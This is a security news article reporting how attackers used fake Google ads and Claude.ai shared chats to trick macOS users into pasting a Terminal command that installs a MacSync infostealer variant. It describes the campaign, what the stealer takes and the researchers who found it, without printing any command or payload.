Hackers Exploit Google Ads and AI Chats for Malware Distribution on Macs
Malware Campaign Targets macOS Users Through Legitimate Google Ads and Claude.ai Chats
A recent malvertising campaign has been observed, exploiting Google Ads and legitimate Claude.ai shared chats to deliver macOS malware to unsuspecting victims.
The Scheme Involves Fake Google Ads and Claude.ai Shared Chats
The scheme involves creating fake Google ads that direct users to Claude.ai’s official website, where they are presented with a shared chat containing malicious instructions.
These instructions prompt users to open Terminal and paste a command, which ultimately leads to the download and execution of a malicious payload on their macOS device.
The Malware Campaign Was Discovered by Berk Albayrak
Berk Albayrak, a security engineer at Trendyol Group, found a Claude.ai shared chat presenting itself as an official “Claude Code on Mac” installation guide, attributed to “Apple Support.”
The chat instructed users to open Terminal and paste a command, which silently downloaded and executed a malicious payload from a domain hosted on customroofingcontractors[.]com.
Further Investigation Revealed a Second Shared Claude Chat Carrying Out the Same Attack
Further investigation revealed a second shared Claude chat carrying out the same attack through entirely separate infrastructure.
This chat followed an identical structure and social engineering approach but used different domains and payloads.
Both chats were publicly accessible at the time of discovery.
The Malware Identified by Researchers Is a Variant of the MacSync macOS Infostealer
Upon analyzing the malware, researchers identified that it is a variant of the MacSync macOS infostealer.
The malware harvests browser credentials, cookies, and macOS Keychain contents, packages them up, and exfiltrates them to the attacker’s server.
The Variant Identified by Albayrak Appeared to Skip Profiling Steps
The variant identified by Albayrak appeared to skip the profiling steps and went straight to execution.
While the variant identified by BleepingComputer collected the victim’s external IP address, hostname, OS version, and keyboard locale before delivering the payload.
Treating Instructions Asking Users to Paste Terminal Commands With Caution
Researchers have highlighted the importance of treating any instructions asking users to paste Terminal commands with caution, regardless of where those instructions appear to come from.
Malvertising Has Become a Common Method for Delivering Malware
Malvertising has become a common method for delivering malware, and this campaign serves as a reminder of the evolving tactics employed by attackers.
As users continue to rely on online platforms and services, they must remain vigilant against such threats.
Related News: New Variant of Malware Dubbed Beagle
In related news, researchers have discovered a new variant of malware, dubbed Beagle, which is delivered via a fake Claude AI website.
Additionally, Google has expanded its Gemini AI capabilities to fight malicious ads on its platform, highlighting the ongoing efforts to combat online threats.
As the landscape of online threats continues to evolve, it is essential for individuals and organizations to stay informed and take necessary precautions to protect themselves against malware and other cyber threats.